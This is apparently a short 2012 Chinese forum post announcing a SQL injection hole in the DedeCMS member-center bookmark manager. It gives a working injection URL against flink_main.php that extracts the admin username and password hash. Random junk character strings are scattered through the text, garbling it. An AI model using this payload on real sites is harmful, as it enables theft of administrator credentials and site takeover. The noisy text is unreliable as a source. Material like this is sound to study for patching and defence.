DedeCMS会员中心SQL注射漏洞! F/ O: Q+ O4 _) ]
需要magic_quotes_gpc = Off
7 }2 q4 M, y- n( Z会员登录后可以执行SQL语句查询数据库任意内容如管理员密码." t3 J- m+ ^7 T# S0 o$ ]( g
8 h$ g1 G4 C' f s! N- bDedeCMS会员中心书签管理SQL注射漏洞% i- b6 R- l6 G0 E$ _, l" f7 m
成功利用该漏洞可获得管理员密码9 x. `5 v: j7 `# p% v
: F& W- V( E- ~9 p4 u
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
4 [! x: F6 R6 v4 ?, C$ T1 J
2 \$ t6 H0 T( E3 }$ Phttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
5 a+ n! u' g) L% d |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59